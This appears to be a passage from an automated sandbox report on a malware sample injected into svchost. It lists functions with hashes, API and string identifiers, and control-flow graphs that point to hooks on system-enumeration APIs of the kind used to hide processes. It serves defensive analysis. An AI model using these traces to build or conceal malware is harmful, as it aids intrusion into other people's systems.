                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 44394e3bb61418d90b21b3d16070fd92066106fc5670cf8bb63d378dec672435
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: F5318CB9635A4BA0EB05EBAAE8716F42321B705394FC05073EC1D135B6AF78828DC352
                                                        Function 000001F2BD16A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 574 1f2bd16a544-1f2bd16a5ac call 1f2bd16b414 577 1f2bd16a5b2-1f2bd16a5b5 574->577 578 1f2bd16aa13-1f2bd16aa1b call 1f2bd16c748 574->578 577->578 579 1f2bd16a5bb-1f2bd16a5c1 577->579 581 1f2bd16a5c7-1f2bd16a5cb 579->581 582 1f2bd16a690-1f2bd16a6a2 579->582 581->582 586 1f2bd16a5d1-1f2bd16a5dc 581->586 584 1f2bd16a6a8-1f2bd16a6ac 582->584 585 1f2bd16a963-1f2bd16a967 582->585 584->585 587 1f2bd16a6b2-1f2bd16a6bd 584->587 589 1f2bd16a969-1f2bd16a970 585->589 590 1f2bd16a9a0-1f2bd16a9aa call 1f2bd169634 585->590 586->582 588 1f2bd16a5e2-1f2bd16a5e7 586->588 587->585 593 1f2bd16a6c3-1f2bd16a6ca 587->593 588->582 594 1f2bd16a5ed-1f2bd16a5f7 call 1f2bd169634 588->594 589->578 591 1f2bd16a976-1f2bd16a99b call 1f2bd16aa1c 589->591 590->578 600 1f2bd16a9ac-1f2bd16a9cb call 1f2bd167940 590->600 591->590 597 1f2bd16a894-1f2bd16a8a0 593->597 598 1f2bd16a6d0-1f2bd16a707 call 1f2bd169a10 593->598 594->600 608 1f2bd16a5fd-1f2bd16a628 call 1f2bd169634 * 2 call 1f2bd169d24 594->608 597->590 601 1f2bd16a8a6-1f2bd16a8aa 597->601 598->597 612 1f2bd16a70d-1f2bd16a715 598->612 605 1f2bd16a8ac-1f2bd16a8b8 call 1f2bd169ce4 601->605 606 1f2bd16a8ba-1f2bd16a8c2 601->606 605->606 621 1f2bd16a8db-1f2bd16a8e3 605->621 606->590 611 1f2bd16a8c8-1f2bd16a8d5 call 1f2bd1698b4 606->611 642 1f2bd16a648-1f2bd16a652 call 1f2bd169634 608->642 643 1f2bd16a62a-1f2bd16a62e 608->643 611->590 611->621 617 1f2bd16a719-1f2bd16a74b 612->617 618 1f2bd16a887-1f2bd16a88e 617->618 619 1f2bd16a751-1f2bd16a75c 617->619 618->597 618->617 619->618 623 1f2bd16a762-1f2bd16a77b 619->623 624 1f2bd16a8e9-1f2bd16a8ed 621->624 625 1f2bd16a9f6-1f2bd16aa12 call 1f2bd169634 * 2 call 1f2bd16c6a8 621->625 627 1f2bd16a874-1f2bd16a879 623->627 628 1f2bd16a781-1f2bd16a7c6 call 1f2bd169cf8 * 2 623->628 629 1f2bd16a900 624->629 630 1f2bd16a8ef-1f2bd16a8fe call 1f2bd169ce4 624->630 625->578 633 1f2bd16a884 627->633 655 1f2bd16a7c8-1f2bd16a7ee call 1f2bd169cf8 call 1f2bd16ac38 628->655 656 1f2bd16a804-1f2bd16a80a 628->656 638 1f2bd16a903-1f2bd16a90d call 1f2bd16b4ac 629->638 630->638 633->618 638->590 653 1f2bd16a913-1f2bd16a961 call 1f2bd169944 call 1f2bd169b50 638->653 642->582 659 1f2bd16a654-1f2bd16a674 call 1f2bd169634 * 2 call 1f2bd16b4ac 642->659 643->642 647 1f2bd16a630-1f2bd16a63b 643->647 647->642 652 1f2bd16a63d-1f2bd16a642 647->652 652->578 652->642 653->590 675 1f2bd16a815-1f2bd16a872 call 1f2bd16a470 655->675 676 1f2bd16a7f0-1f2bd16a802 655->676 663 1f2bd16a80c-1f2bd16a810 656->663 664 1f2bd16a87b 656->664 680 1f2bd16a676-1f2bd16a680 call 1f2bd16b59c 659->680 681 1f2bd16a68b 659->681 663->628 665 1f2bd16a880 664->665 665->633 675->665 676->655 676->656 684 1f2bd16a686-1f2bd16a9ef call 1f2bd1692ac call 1f2bd16aff4 call 1f2bd1694a0 680->684 685 1f2bd16a9f0-1f2bd16a9f5 call 1f2bd16c6a8 680->685 681->582 684->685 685->625
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: d5e0ca40e81d9d4a17391a4d0fb4706baa6880c7b00ec249b536ae7b7c49b8b2
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: BDE1F57A621B838AEB20DF65D4603FD77A4F744B98F900126EF8957B9ACB34D481C706
                                                        Function 000001F2BD16104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 721 1f2bd16104c-1f2bd1610b9 RegQueryInfoKeyW 722 1f2bd1611b5-1f2bd1611d0 721->722 723 1f2bd1610bf-1f2bd1610c9 721->723 723->722 724 1f2bd1610cf-1f2bd16111f RegEnumValueW 723->724 725 1f2bd1611a5-1f2bd1611af 724->725 726 1f2bd161125-1f2bd16112a 724->726 725->722 725->724 726->725 727 1f2bd16112c-1f2bd161135 726->727 728 1f2bd161147-1f2bd16114c 727->728 729 1f2bd161137 727->729 731 1f2bd161199-1f2bd1611a3 728->731 732 1f2bd16114e-1f2bd161193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->732 730 1f2bd16113b-1f2bd16113f 729->730 730->725 733 1f2bd161141-1f2bd161145 730->733 731->725 732->731 733->728 733->730
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 4129ac803274aa25b024b198ef83d0f7a517cdb801d32a117a9186af29447f03
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 9D4171B7224B86C6E7A0CF61E4543EE77A1F389B98F448129DE8907B58DF38C485CB01
                                                        Function 000001F2BD16D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 43319ffa0c7ee914352e92ba5d38087bee9b4dd8faa5ceab62ab6c6d6a778b8b
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 4611D03872528341FB68A7755A713F923416B443F0FA84734ED3D066EADE78C442A303
                                                        Function 000001F2BD167510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 96eb2be9ce1bb00abb2c46e894f9b4b09165b72cda165d31dba4d8d7e2e0f222
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: E981C37973064386FB50AB65A4713F96390A785780FD88535EE0847FAEEB78C845C723
                                                        Function 000001F2BD165B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: ee09959155a2eac8c82d5250b8b01ccc16e451735121b4104c9fa91c9d301f77
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 42D18F7A215B8A81EB70DB15E4943EA7BA0F388B84F500126EECD47BA5DF3DC551CB01
                                                        Function 000001F2BD162F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 7f80d1afa80db319671d8072da7637dd5eac392f218b8f1172c2418ba6a9fafe
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 43319C3A721B53C2EB54CF66A5647FAA7A0FB44B84F888030DE4847B65EF38C4A5C701
                                                        Function 000001F2BD16199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 5c996072e7495a570841e87374aa50147b4650859bf0fccf7ad7f1c2ba7911ee
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: D4018CB1320A8382EB90DB52A8687E963A1F788FC1F884035DE4D43B65DF3CC989C701
                                                        Function 000001F2BD1636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 7e45d6de1701cbc48d00c2f5e89c2684de88328f7a74c5b911fd512dc97d2502
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 74012DB9321B4382EF659B62E8283FA73A0BB55B86F940538CD4907764EF3DC108C702
                                                        Function 000001F2BD169005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 87c6860d37f0f3b42e4d04458acec92380321f76e05e6566a8e7a1b9f8bd8476
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2351BEBA7216038BEB54DF15E468BF93796F348BA8FA18134DE0647788EB75C841C702
                                                        Function 000001F2BD168FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 17ddcd350c3fbab4c69cdfef475f0483a489c2ef7412cbcd3883b63ab174adac
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 5A31E07A32064387EB10DF11E8687E937A8F344BD8F958124EE4607799DB39C941C706
                                                        Function 000001F2BD163044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 1b3ecc0efa6a92ca3f3c221fe06cef17b10792bda2791879ca196cc9822a9c58
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 14F01CB4728B8782EB548B53B9241F96761AB48FD0F889131EE4A47B68DF3CC449C702
                                                        Function 000001F2BD16BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 771891675fd56f81d4029b47b866c1a450b575f78d7e4331bfb30d922d75a8a2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 1DF06DB5221B0781FB508B68E8643F96320FB89BA5FD44239DE6A462F4CF3CC188C311
                                                        Function 000001F2BD1650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: a2ce81cf2cdac8cd3529f73802a6a72a0eb116d24f0474fd80187788a1aaa17d
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: BA02DD36229B8686E760CB55F4943AEBBA0F3C4784F504125EB8E47BA9DF7DC484CB01
                                                        Function 000001F2BD165710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 24dc54690249d3895b1b7c38b4582e1f8e2edf1faac8764183dfcb93513ee1e5
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 1561CD3A629B87C6F760CB15E4643AA7BA4F388784F900125EE8D47BA8DB7DC450CF01
                                                        Function 000001F2BD174104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: c7ddc661428dab41173e4d3144494a3fabc548170c45f95645eedb0a9107dcdf
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: EE119EF2B70A5321F76565A8E8723F933446B683B8FD90634ED76266F68B38D8414202
                                                        Function 000001F2BD16AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 302e9147bf9768ba2ee2bef3a396fc63e43c9e22c51b2e116c3aec92e75da88d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 32519E7A1213838AEB648F2595A43FD77A0F354B88F944126EE9947BD5CB38D490C70A
                                                        Function 000001F2BD172058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: d9d41c282d7b2ce4aabfec58e688f1acd234d9b95e1d190f9a901a1bb8711e21
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 9AD102B2B24A8289E711CFB9D4503EC3BB1F355798F904226CE5E97BAADA34C507C341
                                                        Function 000001F2BD1614A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: d184098e54eec87762a1176ca5ed68c29c5bc5f7beb0174887d068f72f7a5b95
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: BB0148B6620A93D6E784EF66E9182EA77A0F788F81F444435EE4A4372ADF38C451C741
                                                        Function 000001F2BD172980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 17a65dbcd4a12060c852e93996711d64427f50b652a06d50e707f5cc3a2a7ab4
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 7A9104B2B2465389FB60DF6594A03FD3BE0F715B88F944129DE0A67AA5DB34C483C702
                                                        Function 000001F2BD167960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 07055c1e54dafde211750482fff6b81622a8c3b3aaec0e8e3cdeaa1c6361cc99
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: C3112E76720F4289EB40CF60E8643F833A4F759758F840E31DE6D46BA4DB78D1988381
                                                        Function 000001F2BD16253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: a4e0a277eb074df162ec384e4e3874137e7a14a5b34a9f4edaae454dd5bfc79b
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: A171E33B220B8386E725DF26E8647FA6794F399B84FC40036DE0A57B89DE35C645C702
                                                        Function 000001F2BD162330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 56eacd1cb70559ca7de4228d062e7ff752e37e0c1dc9b712038d02919abea6b6
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 7F51F33A22878381E774DE2AA4783FAA791F3C6784FD40135DE5903B9ADE39C545C742
                                                        Function 000001F2BD1726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
